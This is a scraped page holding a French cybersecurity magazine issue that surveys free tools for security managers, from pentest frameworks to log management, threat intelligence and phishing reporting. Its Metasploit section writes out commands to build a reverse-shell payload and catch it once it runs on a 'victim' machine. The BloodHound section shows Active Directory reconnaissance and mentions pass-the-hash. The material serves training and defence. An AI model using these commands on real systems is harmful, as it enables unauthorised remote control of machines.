Sécurisation d'un site internet
Sécurisation d'un site internetSécurisation d'un site internet
Sécurisation d'un site internet
 
Geek handbook
Geek handbookGeek handbook
Geek handbook
 
Introduction à Linux et aux logiciels libres
Introduction à Linux et aux logiciels libresIntroduction à Linux et aux logiciels libres
Introduction à Linux et aux logiciels libres
 
No code low code
No code low codeNo code low code
No code low code
 
Atelier hadoop-single-sign-on
Atelier hadoop-single-sign-onAtelier hadoop-single-sign-on
Atelier hadoop-single-sign-on
 
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptx
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptxMISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptx
MISE EN ŒUVRE ET IMPLEMENTATION SUR GLPI.pptx
 
Mon Cloud - Présentation des services
Mon Cloud - Présentation des servicesMon Cloud - Présentation des services
Mon Cloud - Présentation des services
 
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...
Comment retrouver, nettoyer, organiser et gérer l’information dans votre entr...
 
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...
Rational France - Livre blanc - Choisir le bon outil pour outils pour faire d...
 
Rational France livre blanc - choisir le bon outil pour faire du bon travail
Rational France livre blanc - choisir le bon outil pour faire du bon travailRational France livre blanc - choisir le bon outil pour faire du bon travail
Rational France livre blanc - choisir le bon outil pour faire du bon travail
 
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...
Atelier ENP - Comment gérer l'activité de votre entreprise et la relation cli...
 
Sécurité informatique - 10 erreurs à ne pas commettre
Sécurité informatique - 10 erreurs à ne pas commettreSécurité informatique - 10 erreurs à ne pas commettre
Sécurité informatique - 10 erreurs à ne pas commettre
 
Galtier Concilier securite et simplicite
Galtier Concilier securite et simpliciteGaltier Concilier securite et simplicite
Galtier Concilier securite et simplicite
 

Cyberun #12

  • 1. La trousse à outils Attaquer pour mieux défendre _02 Superviser _04 Se renseigner _06 Se préparer au pire _08 Améliorer les applications _10 Les grognements de Cy-Bear _12 10 autres outils proposés par nos experts _12 S O M M A I R E 12 outils (gratuits) à essayer pour les RSSI... et les autres ! Les situations de crise nécessitent de larges compétences transverses, mais également des connaissances techniques approfondies. Pour pouvoir décider rapidement et efficacement, le RSSI et, plus généralement, les top-managers en sécurité vont puiser dans l’ensemble de leur culture cyber, mais vont également devoir (re-)mettre “les mains dans le cambouis”. Cet aspect technique est parfois délaissé, voire décrié, en raison d’autres impératifs. Pourtant, c’est un point clé pour mieux envisager les solutions, en connaître les limites et construire une stratégie, tout en améliorant la communication avec les équipes opérationnelles. Culturellement, la cybersécurité repose sur une dichotomie entre le secret et le partage. L’open source est l’une des clés de traçabilité des solutions. Les développements communautaires fleurissent, tout comme les groupes plus “dark”. Résultat, des centaines d’outils gratuits sont à notre disposition pour mieux connaître le fonctionnement des attaques, pour les détecter, pour les gérer, ou encore les éviter. Loin de se vouloir exhaustifs, nos experts vous en proposent une douzaine. Il s’agit d’en découvrir le fonction- nement de façon pratique, de vous guider dans leur utilisation : se former (voir combien il est simple de mener une attaque...), renforcer sa résilience (sensibiliser sur le spam et préparer des contre-mesures), gagner en maturité en attendant de pouvoir passer à des solutions plus avancées (par exemple dans le cas de la gestion des logs ou pour sécuriser les annuaires Active Directory), ou encore simplifier ses processus organisationnels. A vous de piocher dans cette trousse à outils en fonction des besoins de votre organisation. 5 idées à retenir… “Outils gratuits” équivaut à “pas de frais de licence”. Le coût humain/temporel n’est toutefois pas à négliger. Prendre le temps d’essayer par soi-même des solutions peut provoquer une amélioration sensible de sa maturité technique, préjudiciable aux discours marketing trop édulcorés. Les solutions open source ou gratuites permettent de débroussailler des problématiques, créer des PoC et faire avancer l’entreprise. De plus en plus d’outils gratuits disposent également de versions “commerciales”, proposant une assistance technique, une interface plus avancée... Pour choisir entre plusieurs solutions gratuites “concurrentes”, regardez la fréquence des mises à jour, la taille des communautés de développeurs et la qualité des forums de discussion. J U I L 2 0 2 0 12 C Y B E R S E C U R I T Y S T R AT E G I E S c y b e r u n . n e t Toolbox
  • 2. _Cyberun#12 Plus besoin d’être un génie pour utiliser des outils d’attaque, fortement démocratisés. Le temps nécessaire est souvent réduit à quelques minutes, voire quelques secondes. ATTAQUER POUR MIEUX DÉFENDRE _02 / _03 _01 : Lancer une attaque L’activité d’audit de sécurité, qui vise à tester votre degré de vulnérabilité à certaines failles de sécurité des systèmes d’information, fait largement appel à des produits open source, tels que Nessus – qui, à l’origine, était gratuit – et Metasploit, qui dispose d’une version open source. Nessus est un scanneur de vulnérabilités, alors que Metasploit, dans sa version gratuite, est plutôt un framework de vulnérabilités et d’exploits. Entièrement développé en langage Ruby, il intègre des modules propres à certains exploits que l’on peut développer en Ruby, Perl, PHP, C++ ou C. Le produit s’enrichit grâce à une large communauté de développeurs qui s’occupe d’inclure nombre de failles (CVE) très rapidement. Avec son large panel de modules, Metasploit permet la collecte d’informations/de traces réseaux, la prise de contrôle machine (bind shell/reverse shell), l’escalade de privilèges, mais aussi des keyloggers ou d’outils permettant la capture d’écran de la machine victime. Plus de 2 000 modules (“exploits”) sont disponibles, permettant quasiment à tout un chacun de lancer une attaque. Si Nessus se concentre plutôt sur des vulnérabilités réseaux, Metasploit va permettre de mettre à mal des logiciels de protection comme les antivirus ou les firewalls personnels. Il est intégré aux distributions Linux Kali ou ParrotOS ou peut être téléchargé depuis www.metasploit.com (une version Windows existe également). Commençons par créer une “charge”, ou payload. Depuis le dossier metas- ploit-framework/bin, lancez la commande msfvenom -p windows/meterpreter/ reverse_tcp lhost=192.168.0.100 lport=8080 -f exe > monmalware.exe en chan- geant (systématiquement) 192.168.0.100 par l’adresse IP de votre machine. Trouvez un moyen pour que le programme monmalware.exe soit téléchargé, puis exécuté sur la machine de votre victime. En parallèle, saisissez : msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse _ tcp set lhost 192.168.0.100 set lport 8080 exploit Lorsque monmalware.exe sera lancé (si le port 8080 est bien accessible), un shell sera disponible (indiqué par meterpreter >). Tapez par exemple “dir c:” pour obtenir la liste des fichiers du poste de la victime. Boîte à outils exceptionnelle, Metasploit se targue d’être l’outil le plus utilisé en test d’intrusions. Metasploit est gratuit en version ligne de com- mande. Depuis son acquisition par la société Rapid 7 en 2009, il existe une version pro payante qui dispose d’une interface graphique et qui inclut la grande majorité des modules. Depuis sa version 2017, Metasploit a intégré des outils de fuzzing, qui permettent d’injecter des données aléatoires. Vous pouvez donc tester vos applica- tions, voir leurs réactions et détecter une faille sur l’application en tant que telle. PaloAltoNetworksutiliseMetasploit,parexemple, dans le cas de proof of concept quand le client souhaite tester certaines attaques précises. Il est également utilisé dans nos environnements de démo afin de montrer comment notre plateforme peut prévenir les attaques. Nous l’utilisons également dans les environnements dédiés à l’éducation (ainsi, Metasploit est intégré à notre environnement cloud dédié). BloodHound (en référence à la race de chien limier) est un projet open source (gratuit/GNU General Public License) et il est principalement maintenu par Andrew Robbins de la société SpecterOps, qui développe des outils professionnels pour les Red Teams. Mais l’origine de Blood- Hound est bel et bien française ! En 2014, deux membres de l’ANSSI, Lucas Bouillot et Emmanuel Gras, rédigent Chemins de contrôle en environnement Active Directory, qui sera le fondement de l’outil BloodHound, à savoir la théorie des graphs appliquée à la sécurité Active Directory. Régulièrement utilisé lors des attaques sur Active Directory, le code de BloodHound est également intégré à certains malwares, permettant l’analyse des mauvaises configurations Active Directoryetledéploiementàl’échelledela charge de chiffrement. Depuis, Emmanuel Gras a cofondé la société Alsid avec Luc Delsalle : Alsid for AD est une solution s’adressant aux professionnels de la sécu- rité permettant de mettre en évidence les mauvaises configurations liées à Active Directory et vous explique comment les corriger. Alsid for AD vous permettra également d’être alerté en temps réel si un nouveau chemin apparaît en capturant l’ensemble des modifications réalisées dans Active Directory. FRÉDÉRIC NAKHLÉ | Senior Manager System Engineering EMEA, Palo Alto Networks METASPLOIT BLOODHOUND SYLVAIN CORTES | Security Evangelist, Alsid BloodHound permet d’explorer et de comprendre les chemins de compromission au sein de l’annuaire Active Directory (AD) afin d’en détecter les faiblesses. Outil classique des Red Teams, il présente sous une forme graphique explicite les différents chemins exploi- tables (liés à des mauvaises configurations de l’AD) afin de devenir administrateur de domaine sur l’environnement cible. Il n’est toutefois pas un outil d’attaque directe, au sens où il ne permet pas, par exemple, d’exécuter des reverse shells, de capturer des mots de passe ou d’injecter des DLL. La cartographie de l’infrastructure est tout à fait primordiale pour un attaquant, car elle lui permettra de cibler les ressources ou objets à compromettre pour rapidement arriver à ses fins. Dans un Active Directory de plusieurs milliers d’objets, il est nécessaire pour l’atta- quant ou le malware d’accélérer son processus de compromission en visant les objets principaux qui possèdent des “faiblesses”. Ces faiblesses peuvent être d’ordre structurel ou comportemental, mais l’idée est de toucher directement au but en ayant, au préalable, par- faitement cartographié l’environnement pour gagner en efficacité. Pour installer BloodHound et ses dépendances sur un système, par exemple sur une machine sous Windows 10, vous devez être admi- nistrateur local de la machine. Néanmoins, vous n’aurez pas besoin d’être administrateur du domaine Active Directory pour utiliser l’outil, ce qui est d’ailleurs logique, puisque l’objectif de BloodHound est justement de définir les chemins d’attaque pour le devenir ! Il suffira d’utiliser un compte utilisateur de domaine sans pouvoirs particuliers, permettant la lecture des objets Active Directory via le protocole LDAP, ce qui est un droit par défaut de tous les utilisateurs créés dans Active Directory. Pour réaliser votre installation, assurez-vous que les packages Java pour votre environnement ainsi que le .NET Framework 3.5 sont installés. La version communautaire (gratuite) du serveur Neo4j est également requise. Utilisé dans de nombreux projets commu- nautaires et applications professionnelles et disposant d’une large communauté d’utilisateurs, Neo4j est un système de gestion de bases de données basé sur les graphs. Rendez-vous ensuite sur GitHub (https://github.com/BloodHoun- dAD/BloodHound) et téléchargez à la fois la version compilée (Blood-Hound-win32-x64.zip) et la version non compilée. Neo4j est un système de gestion de bases de données basé sur les graphs, développé en Java par la société Neo Technology. Une version communautaire est disponible en open source. La première étape consiste à collecter les données à l’aide de SharpHound (situé dans le répertoire Ingestors). Depuis une fenêtre de commande, rendez-vous dans le répertoire Ingestors et lancez SharpHound.exe --CollectionMethod All. Un fichier ZIP sera généré dans le même répertoire. Pour l’injecter, ouvrez l’interface principale en vous rendant dans le dossier BloodHound-win32-x64, puis en lançant BloodHound.exe. Une fois l’authentification à Neo4j effectuée, importez le fichier ZIP en cliquant sur le bouton Upload Data. Le premier graph apparaît. Il faut distinguer les nodes, les edges et les paths. Les nodes sont globalement des objets – un utilisateur, une machine, un groupe, un domaine. Les edges sont les relations entre les objets – l’appartenance à un groupe, le fait d’être administrateur d’un objet. Le path est un ensemble de nodes connectés par des edges et définit un chemin d’attaque. Le bouton Queries présente des requêtes prêtes à l’usage et permet de lancer les premières recherches simples. L’une des meilleures requêtes préformatées pour commencer l’exploration des chemins de compromission est la requête Shortest Paths to High Value Targets.Legraphvousprésenteraainsilesrelationsentrelesdifférents objets du domaine, avec notamment les comptes à pouvoir et leurs groupes, sur quelles machines les comptes à pouvoir ont déjà ouvert des sessions, quel groupe est capable d’administrer quel objet, les liens d’application des stratégies de groupe (GPO). Si vous trouvez un administrateur local connecté sur une machine, un outil tel que Mimikatz pourra jouer une attaque de type “pass-the-hash” afin de devenir administrateur du domaine. _02 : Cartographier les chemins de compromission Active Directory Exemple de graph résultant de la requête Shortest Paths to High Value Targets L A T R O U S S E À O U T I L S
  • 3. _Cyberun#12 Contrôler le bon fonctionnement des systèmes, suivre les processus projets et leur avancée, consolider les logs : autant de clés pour obtenir une vision à 360° de ses systèmes d’information. SUPERVISER _Cyberun#12 Toutes les entreprises disposent d’outils de sécurité IT, mais que se passe-t-il s’ils ne sont pas opérationnels ? C’est là que la supervision assure sa fonction de méta-sécurité à 360 °. Dans le cas d’un antivirus, par exemple, PRTG permet de contrôler que l’ensemble du parc de machines est couvert, le niveau de mise à jour pour chacune d’entre elles, et d’établir des statistiques globales de détections de virus. De plus, avec ses fonctions natives et inédites de détection de comportements inhabituels, PRTG permet d’anticiper d’éventuelles intrusions sur le réseau de l’entreprise. Des capteurs personnalisés qui adaptent de nombreux scripts libres de droits sont aussi disponibles. L’une des grandes forces de PRTG est d’être très simple à prendre en main, de ne nécessiter aucune compétence spécifique. La version gratuite de PRTG permet de réaliser de nombreux POC en toute liberté avant de passer, si besoin, à une version payante pour augmenter le nombre de capteurs. https://www.fr.paessler.com/ download/prtg-download Dans une précédente vie entrepreneuriale, j’ai utilisé Graylog comme log manager avec l’idée de développer une couche SIEM afin de créer une plateforme de protection des applications. Cette plateforme était constituée de firewalls, IPS, WAF... qui analysaient le trafic pour détecter les comportements anormaux, et donc de potentielles attaques. Ces divers éléments généraient donc des quantités de logs qu’il fallait analyser. Un syslog aurait été un simple réceptacle et un SIEM un investissement trop important pour une jeune entreprise. Graylog a montré ses capacités à centraliser les logs quel que soit le format. L’interface d’analyse d’événements facilite le croisement des informations entre les sources de données. En outre, la plateforme disposait d’une adresse IP publique inutilisée sur laquelle tout le trafic était bloqué, mais néanmoins enregistré. Ce trafic représente principalement celui des bots, malveillants ou non. “Le bruit de fond de l’Internet” montrait l’origine des IP qui ont “frappé à la porte”, le malware Mirai (port 7547) ou de bots en recherche d’accès telnet (port 23) ou SSH (port 22) pour de futures tentatives d’intrusion. FABIEN PEREIRA VAZ | Technical Sales Manager, Paessler France _03 : Supervision des services et des réseaux PRTG NETWORK MONITOR _04: Outiller l’intégration de la sécurité dans le cycle de vie des projets BENJAMIN LEROUX | Marketing & Innovation, Advens BERTRAND MÉENS | CTO & Membre du CESIN GRAYLOG RETOUR D’EXPÉRIENCE : GESTION PROJET | AUCHAN Les processus comme l’intégration de la sécurité dans le cycle de vie des projets (ISP) sont vite confrontésàdesdifficultésliéesauvolumedeprojets, comment capitaliser sans ralentir le proces- sus projet. A minima, il va falloir à chaque fois réaliser une analyse de risques, produire un plan de traitement adapté et suivre sa bonne implémentation afin de respecter la politique interne, se mettre en conformité (GDPR, RGS, LPM, etc.), voire répondre aux attentes d’un client stratégique. Il y a quelques années, il fallait rédiger un dossier de sécurité, document “à trous” que le chef de projet devait remplir, avec souvent son courage comme seul soutien. En évo- luant vers un outillage de type Excel ou équivalent, la démarche s’est simplifiée. Ce type de classeur se compose générale- ment de trois éléments. Le questionnaire de qualification initiale évalue le niveau de sécurité à atteindre, via une série de questions simples sur le volet fonctionnel (besoins DICP, nature des données, utilisateurs ciblés, etc.) comme technique (hébergement interne ou externe, technologies nouvelles, etc.). La liste de mesures de sécurité préconisées, issues d’un catalogue de mesures types, regroupe les mesures nécessaires à la qualification. Enfin, le tableau de suivi de l’application des mesures de sécurité va permettre au projet d’acter leur mise en place ou d’échanger avec le RSSI en cas de besoin (blocage, difficulté, etc.) et de prouver l’atteinte du niveau de sécurité souhaité. Bien que ce type d’outil facilite l’ISP, il subsiste des difficultés : comment suivre l’ensemble des projets sans perdre des fichiers Excel ? Comment utiliser l’outil à plusieurs, ou conserver l’historique des changements ? Ces questions ont mené Auchan, avec l’expertise d’Advens, à imaginer unportailwebcollaboratif.Le“DigitalSecurity Workplace” intègre le module KB, une version web de la politique de sécurité des SI (PSSI), sous forme d’une base de données requêtable et une version web de l’ISP, appelée SWITS (Security Within IT Services). ChaqueévolutiondelaKB(PSSI)esttransmise automatiquement aux projets concernés. Les justifications des chefs de projet sont tracées, tout comme les revues des RSSI. _5: Une gestion modernisée des logs Le SIEM est la pierre angulaire de l’outillage du Security Operation Center (SOC), mais beaucoup d’entreprises n’ont ni la maturité, ni le budget. Entre “rester aveugle sur l’activité de son SI” et mettre en œuvre un projet de SOC, un palier intermédiaire permet de faire mûrir son organisation en améliorant la gestion de ses logs. Les solutions open source ont largement fait leurs preuves en cyber (Nessus, Snort, pfSense, etc.) ; la gestion des logs n’est pas une exception avec syslog-ng ou Prelude, et plus récemment avec l’arrivée de la stack ELK (Elasticsearch/Logstash/Kibana) qui nécessite toutefois des compé- tences pour bien l’exploiter. Graylog est une solution packagée de gestion des logs avec une version open source déjà intéressante et une version enterprise qui lorgne vers le SIEM. Graylog intègre Elasticsearch pour gagner en performance lors de requêtes,dispose d’une IHM moderne et d’une API REST (interopérabilité avec d’autres applications). Il propose la collecte facilitée des logs, l’analyse visuelle des logs, des tableaux de bord personnalisables, des alertes avec notification par email ou messagerie instantanée (Slack, Teams, etc.), et des droits multi-utilisateurs. Graylog propose une marketplace de modules complémentaires, tels que de nombreuses librairies (gratuites) pour l’intégration spécifique de logs. _04 / _05 “Le portail DSW rend la connaissance sécurité facilement accessible à tous. Il est au cœur des processus de sécurité d’Auchan Retail. Il apporte visibilité, communication, industrialisation des processus…” explique Frédérick Meyer, CISO d’Auchan Retail. “Le SWITS facilite le processus d’ISP, l’uniformise entre les pays. Grâce à la notion de dépendance, il est vecteur d’économies et de valeur ajoutée, à tel point que d’autres enseignes et d’autres métiers s’y intéressent : DPO, contrôle interne, audit interne, etc.” PRTG Network Monitor est une solution de supervision qui permet d’obtenir une visibilité complète sur la disponibilité et les performances de l’ensemble des infrastructures, systèmes et réseaux de l’entreprise. Elle est donc utile pour les entreprises de tout secteur en tant que complément aux outils traditionnels de cybersécurité, afin de s’assurer que ceux-ci remplissent bien leur rôle de protection. PRTG permet également d’anticiper des menaces potentielles grâce à la détection de comporte- ments inhabituels sur le réseau ou encore d’événements corrélés, en se basant sur l’historique d’utilisation. La supervision est aussi un outil clé pour lutter contre le Shadow IT, puisqu’elle permet de détecter les équipements connectés au réseau sans autorisation, à l’aide d’un scan récurrent. Une fois PRTG installé sur un PC sous Windows et connecté au réseau (version Linux en Beta et version cloud PC/Mac hébergée par Paessler également disponibles), le logiciel propose d’effectuer un scan automatique de tous les équipements et machines du réseau de l’entreprise pour y déployer des capteurs. Ce sont eux qui vont permettre d’obtenir des métriques sur chaque système, routeur, switch ou application de l’entreprise, afin de les superviser. PRTG propose plus de 260 types de capteurs prédéfinis (bande passante, sites web, SNMP, serveurs virtuels, bases de données, etc.) et la possibilité de créer ses propres capteurs et scripts. La version d’évaluation de PRTG permet de déployer un nombre illimité de capteurs durant 30 jours, puis devient automatiquement une version gratuite limitée à 100 capteurs actifs, mais sans aucune limite de temps. Les indica- teurs supervisés par les capteurs sont rassemblés dans un ou plusieurs tableaux de bord person- nalisables, rapides et simples à consulter depuis l’application Desktop, une interface web ou un appareil mobile iOS/Android. Des alertes sur des dépassements de seuil peuvent être configurées afin de recevoir des notifications par email ou SMS, mais aussi d’exécuter un programme si nécessaire. Tous les protocoles et technologies incontournables (SNMP, WMI, SSH, API REST, etc.) ainsi que les applications et équipements d’éditeurs (Cisco, Dell, HP, IBM, NetApp, Linux, AWS, etc.) sont pris en charge par PRTG. En termes de sécurité, PRTG peut superviser les solutions Anti-DDOS, IPS/IDS, les firewalls et antivirus, les reverse proxies, les mises à jour système ou des équipements physiques comme des caméras de sécurité. L A T R O U S S E À O U T I L S
  • 4. Construire une base de connaissances sur les menaces visant l’entreprise permet d’améliorer fortement sa stratégie cyber, sans pour autant nécessiter des moyens financiers très importants. SE RENSEIGNER _Cyberun#12 _06 / _07 OpenCTI est une plateforme ouverte d’analyse de la cybermenace. L’outil, intégralement open source, est aujourd’hui disponible à l’usage de l’ensemble des acteurs de la “Threat Intelligence”. L’application leur permet ainsi de stocker, d’organiser, de visualiser et partager leurs propres connaissances en la matière. L’outil est architecturé autour des trois niveaux de connaissances. Connaissances techniques ou tactiques : cette catégorie regroupe par exemple les indicateurs de compromission, les exemples d’emails de phishing, les artefacts, les listes d’adresses IP ou d’autres éléments obser- vables. Ce sont les éléments techniques qui caractérisent une attaque. Connaissances opérationnelles : moins techniques, il s’agit là de décrire les tactiques des attaquants ou TTP (Techniques, Tactiques et Procédures) utilisées pour entrer et assurer la latéralisation de l’attaque. On y retrouve les types de malwares et les tactiques utilisés. Connaissances stratégiques : on parle ici des grands enjeux comme la typologie des victimes (secteur industriel particulier, taille d’organisation, etc.), de l’attribution (qui a lancé l’attaque), de la motivation du groupe cybercriminel (lucrative, destruction, espionnage, etc.). L’une des grandes forces d’OpenCTI est de permettre de visualiser cette connaissance sur les trois niveaux en même temps, ce qui donne accès à une lecture croisée par secteur/type de cybercriminels/indicateurs de compromission, par exemple. Le projet OpenCTI dépasse les 400 000 téléchargements, possède plus de 20 connecteurs vers diverses sources de CTI et compte une vingtaine de contributeurs actifs. Plus de 500 organisations dans le monde l’utilisent, dont l’ANSSI, le CERT-EU, ClearSky Sec, ou encore Thales. Cette plateforme est utilisable par toute entreprise ou agence publique, quelle que soit sa taille, qui souhaite s’équiper d’un outil puissant et gratuit de gestion de la connais- sance en matière d’analyse de la cybermenace. La plateforme peut s’installer en version on-premise ou dans le cloud, au choix. Vide au départ, OpenCTI possède de nombreux connecteurs qui permettent d’intégrer les grandes sources de Threat Intelligence privées comme open source. Attaché à OpenCTI et contributeur depuis le début, je crois que la démocratisation de l’usage de la CTI est critique pour la prévention et la maîtrise des risques. Développé par l’ANSSI avec le CERT-EU, le projet est unique par les cas d’usage qu’il couvre et la façon dont il a été conçu (décentralisé, scalable). Open source depuis juin 2019, il a reçu le soutien de contributeurs comme Thales, DCSO et IBM, en plus de la commu- nauté open source. Récemment, Thales recherchait une solution pour partager les flux de Threat Intelligence liés à la Covid-19. Cette connaissance devait être disponible pour les ingénieurs, SOC et RSSI du secteur de la santé, chacun ayant besoin d’un niveau d’analyse différent. Déployée en une semaine, OpenCTI a permis d’agréger l’en- semble des flux et sources de CTI à la disposition de Thales, puis de les partager avec les parties prenantes. En plus de 300 000 indicateurs de compromissions mis à disposition, la modélisation a permis de visualiser rapidement les dernières campagnes et les tactiques utilisées. SAMUEL HASSINE | Directeur EDR et sécurité Europe du Sud, Tanium _06 : Plateforme de Threat Intelligence OPENCTI _07: Des sources de renseignements ouvertes, adaptées au marché français Quand on bâtit une bibliothèque de connaissances de Threat Intelligence, il faut couvrir tous les aspects du renseignement (opérationnel, tactique et stratégique). En plus de sources commerciales, notre équipe France recommande les sources gratuites suivantes. YANN LE BORGNE | Directeur technique Europe, ThreatQuotient BENOIT GRUNEMWALD Expert en cybersécurité, ESET France Covid-19 : le sujet parfait pour une campagne de cyberattaque par courriel Les cybercriminels se sont jetés sur le sujet Covid-19, allant jusqu’à déposer 5 000 noms de domaines quotidiennement pour dynamiser leurs campagnes de rançongiciels. Pour y faire face, de nombreuses organisations ont décidé d’offrir des sources de renseignement spécifiques, ouvertes et gratuites pour la plupart (cf. https://github.com/MishcondeReya/Covid-19-CTI). Malgré cet élan de solidarité, de nombreuses organisations se sont vues très vite submergées par la difficulté à “ingérer” ces données. ThreatQuotient met alors à disposition les connecteurs et les dashboards nécessaires pour accélérer la mise en consommation des contre-mesures et identifier les incidents associés à ces campagnes de rançongiciels. MITRE ATT&CK SOURCES OSINT Adversary reader – APT Groups and Operations (https://apt.threattracking.com) Ce document va vous aider à remplir le premier niveau de la bibliothèque avec un référentiel public et une grande quantité de documentations téléchargeables pour un stockage local dans la bibliothèque. MITRE ATT&CK (https://attack.mitre.org/) Le MITRE met à disposition son framework ATT&CK, mais également une base de connaissances sur un certain nombre d’adver- saires. Un jeu de données incontournable. MALPEDIA (https://malpedia.caad.fkie.fraunhofer.de/) Service gratuit focalisé sur l’identification et la fourniture de contexte autour des familles de malwares, MALPEDIA fournit des informa- tions de différents niveaux : adversaires, malwares, samples, règles YARA et contexte. Il fait le lien entre le “haut niveau” (les adver- saires) et les capacités d’action (règles YARA) en s’articulant autour des familles de malwares. NVD (https://nvd.nist.gov/) Publiée par le NIST (National Institute of Standards and Technology), elle offre la possibilité à la bibliothèque de couvrir les cas d’usage associés à la gestion des vulnérabilités au sens large. ExploitDB (https://www.exploit-db.com/) Couplée à la source précédente, il s’agit ici d’obtenir à la fois des informations supplé- mentaires sur des vulnérabilités, mais aussi des informations sur l’exploitabilité de celles-ci et, ainsi, de faire un lien vers des outils et malwares collectés auprès des sources précédentes. AlienVault Pulse (https://otx.alienvault.com/) Il s’agit là des premiers indicateurs techniques actionnables dans les défenses de l’organisa- tion. OTX Pulse permet, sur un mode collabo- ratif, de partager des informations. Les “pulses” apportent à la fois les indicateurs techniques et le lien avec les familles de malwares, les adversaires... Le choix des événements Pulse à intégrer localement dans sa bibliothèque se fait en “suivant” des utilisateurs ou des pulses en particulier. Il faut toutefois apporter un soin particulier au choix de ce que l’on souhaite importer automatiquement, car en multipliant les sélections, on peut rapidement se retrouver débordé par la masse d’informations disponibles. MISP CIRCL (https://www.circl.lu/services/misp- malware-information-sharing-platform/) MISP apporte aussi son cercle de confiance de partage, celui du CIRCL : un très bon mix entre les informations actionnables (indicateurs techniques) et les données de haut niveau fournies dans MISP sous le concept de “galaxies”. Est également disponible la notion de framework, notamment celui du MITRE présenté sous forme de Galaxy. Phishtank (https://www.phishtank. com/) et Bambenek (https://osint.bambe- nekconsulting.com/feeds/) Couramment utilisées par nos clients, elles fournissent des indicateurs actionnables dans les défenses. Elle font également le lien avec les couches supérieures du modèle grâce au contexte véhiculé (famille de malwares, notamment). _08: L’indispensable taxinomie des cyberattaques Intrusion, persistance, mouvement latéral, exploitation : comment décrire un code malveillant  ? Quel est le rôle de telle ou telle vulnérabilité  ? Quelles sont les techniques préférées de tel groupe de pirates  ? C’est là que le modèle MITRE ATT&CK entre en jeu  ! Ce référen- tiel permet de créer des taxinomies structurées, qui décrivent aussi bien les attaques (de l’intrusion à l’exfiltration) que les acteurs malveillants ou les malwares. Pour le RSSI, c’est un formidable moyen de relier la posture cybersécurité de son organisation aux solutions techniques qui y sont déployées. En positionnant les solutions de sécurité installées dans ATT&CK, il visualise immédiatement les techniques ou les étapes d’une compromission contre lesquelles elles se positionnent, et donc les “trous dans la raquette”. En plaçant les “scénarii redoutés” d’une analyse de risque (cf. méthode EBIOS) sur la même matrice, il apparaît les risques avérés, qu’aucune des solutions déployées actuellement ne sait adresser. Il simplifie les échanges en servant de “dorsale” : avec le SOC (mettre en détection des éléments spécifiques en fonction des trous dans la matrice), avec la Threat Intelligence (suivre une menace, et positionner les techniques d’attaques sur la matrice afin de constater quelles mesures manquent)... Chez ESET, MITRE ATT&CK est largement utilisé, aussi bien publiquement qu’en interne. Ainsi, notre blog WeLiveSecurity utilise systématiquement ATT&CK pour formaliser les acteurs ou les menaces traitées. L A T R O U S S E À O U T I L S
  • 5. _08 / _09_Cyberun#12 Une attaque aura forcément lieu : en amont, toute l’entreprise doit améliorer sa culture cyber, “affûter” ses procédures et outils de restauration, mais aussi de collecte de preuves. SE PRÉPARER AU PIRE _09 : Limiter les tentatives de phishing Dans le cadre de la sensibilisation conti- nue de nos utilisateurs à la cybersécurité, nous avons déployé une solution visant à limiter les chances de succès et d’impact d’une attaque par hameçonnage (phishing). SwordPhish est un outil open source, facile à déployer, ayant pour pré-requis l’utilisation du client messagerie Outlook sur les postes de travail. Il existe d’autres outils aux fonctionnalités similaires, dont une version made in France, proposée par le CERT Société Générale, nommée Notify Security. L’implémentation de notre Système de Management de la Sécurité de l’Information (SMSI) a nécessité la mise en place d’indicateurs pour mesurer l’efficacité de nos actions de sensibilisation à la cybersécurité. Le hameçonnage étant l’un des vecteurs d’attaque les plus fréquents, nous avons choisi de travailler sur ce point. Au-delà des mesures techniques de protection contre les emails malveillants, nous voulions renforcer le facteur humain en responsabilisant les utilisa- teurs dans la lutte contre le hameçonnage. Après plus d’une année d’utilisation, nous avons pu mesurer tous les bénéfices de ce type d’outil. Les utilisateurs se sont pris au jeu et reportent des centaines d’attaques par mois. Nous avons même établi un classement pour valoriser les utilisateurs les plus actifs dans la remontée d’attaques par hameçonnage ! Au-delà, cet outil nous a permis de définir plus précisément les services les plus exposés aux tentatives de hameçonnage. Même si nous savions que les services marketing et support seraient en haut du classement, nous disposons maintenant de chiffres pour mieux évaluer les efforts de protection à fournir. Je ne peux donc que conseiller la mise en place de ce type d’outil, très peu coûteux et rapide à déployer, pour mieux protéger les informations de vos entreprises face aux vecteurs privilégiés d’attaques que sont les hameçonnages. Les modules et les cibles choisis avec cette ligne de commande sont très limités en termes de nombre d’artefacts collectés, ils doivent être ajustés pour correspondre aux logiciels principaux présents dans l’environnement de l’entreprise. Notez que le résultat du script de collecte ne doit jamais être écrit dans la partition C: car cela écrase des espaces non alloués, qui pourraient contenir des artefacts supprimés utiles. Les résultats sont enregistrés dans le dossier “kape_<hostname>_output”. C’est dans ce répertoire que se trouve le fichier zip (protégé par un mot de passe : very_long_secure_password) qui sera analysé par l’équipe CERT. Cette extension Outlook (add-in) permet à chaque utilisateur d’être acteur de la protection de l’entreprise contre les tentatives de hame- çonnage. Pour cela, rien de plus simple ! Une fois le script d’installation déployé (https://github.com/Schillings/SwordPhish), les utilisateurs découvrent une nouvelle icône représentant un espadon dans le bandeaudeleurapplicationOutlook.Lechoixsymboliqued’unpoisson pour le visuel est important, car il participe à l’adoption de l’outil en se différenciant des autres fonctionnalités d’Outlook. Lorsque l’utilisateur détecte un message suspect ou malveillant, un simple appui sur l’icône de SwordPhish suffit pour que le mes- sage soit classé dans les “spams” de la boîte mail et soit immédiate- m e n t t r a n s f é r é à l’équipe sécurité. Dès lors, cette dernière reçoit un email, avec toutes les informations “sources” nécessaires et le message initial en pièce jointe. Plusieurs fiches réflexes ont été défi- nies en réponse à ces alertes : cela peut aller d’un simple message de remerciement à l’utilisateur pour sa participation à la protection des informations de l’entreprise à un message de sensibilisation et d’alerte auprès de tous les utilisateurs de l’entreprise, en illustrant l’attaque par l’un des 